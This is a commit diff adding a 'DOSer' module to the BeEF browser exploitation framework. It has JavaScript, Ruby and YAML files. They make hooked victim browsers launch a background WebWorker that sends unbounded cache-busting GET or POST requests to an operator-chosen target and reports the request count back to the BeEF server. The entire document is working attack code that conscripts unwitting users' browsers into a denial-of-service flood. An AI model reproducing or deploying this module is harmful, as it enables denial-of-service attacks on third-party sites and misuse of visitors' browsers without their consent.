Added DOS module which allows you to send multiple GET or POST requests to a target, from a WebWorker in order to don't slow down the whole browser.

modules/network/DOSer/command.js

@@ -0,0 +1,33 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var url = '<%= @url %>';
+    var delay = '<%= @delay %>';
+    var method = '<%= @method %>';
+    var post_data = '<%= @post_data %>';
+
+    if(!!window.Worker){
+    var myWorker = new Worker('http://' + beef.net.host + ':' + beef.net.port + '/worker.js');
+
+    myWorker.onmessage = function (oEvent) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data);
+    };
+
+        var data = {};
+        data['url'] = url;
+    data['delay'] = delay;
+    data['method'] = method;
+    data['post_data'] = post_data;
+
+    myWorker.postMessage(data);
+    }else{
+       beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.');
+    }
+
+
+});

modules/network/DOSer/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        doser:
+            enable: true
+            category: "Network"
+            name: "DOSer"
+            description: "Do infinite GET or POST requests to a target, spawning a WebWorker in order to don't slow down the hooked page. If the browser doesn't support WebWorkers, the module will not run."
+            authors: ["antisnatchor"]
+            target:
+                working: ["ALL"]

modules/network/DOSer/module.rb

@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Doser < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/doser/worker.js', '/worker', 'js')
+  end
+
+  def self.options
+    return [
+    	{'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'},
+      {'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'},
+      {'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'},
+      {'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'}
+    ]
+  end
+  
+  def post_execute
+    return if @datastore['result'].nil?
+    save({'result' => @datastore['result']})
+  end
+  
+end

modules/network/DOSer/worker.js

@@ -0,0 +1,45 @@
+var url = "";
+var delay = 0;
+var method = "";
+var post_data = "";
+var counter = 0;
+
+onmessage = function (oEvent) {
+ url = oEvent.data['url'];
+ delay = oEvent.data['delay'];
+ method = oEvent.data['method'];
+ post_data = oEvent.data['post_data'];
+ doRequest();
+};
+
+function noCache(u){
+ var result = "";
+ if(u.indexOf("?") > 0){
+  result = "&" + Date.now() + Math.random();
+ }else{
+  result = "?" + Date.now() + Math.random();
+ }
+ return result;
+}
+
+function doRequest(){
+ setInterval(function(){
+
+  var xhr = new XMLHttpRequest();
+  xhr.open(method, url + noCache(url));
+  xhr.setRequestHeader('Accept','*/*');
+  xhr.setRequestHeader("Accept-Language", "en");
+  if(method == "POST"){
+    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+    xhr.send(post_data);
+  }else{
+    xhr.send(null);
+  }
+  counter++;
+
+ },delay);
+
+ setInterval(function(){
+ postMessage("Requests sent: " + counter);
+ },10000);
+}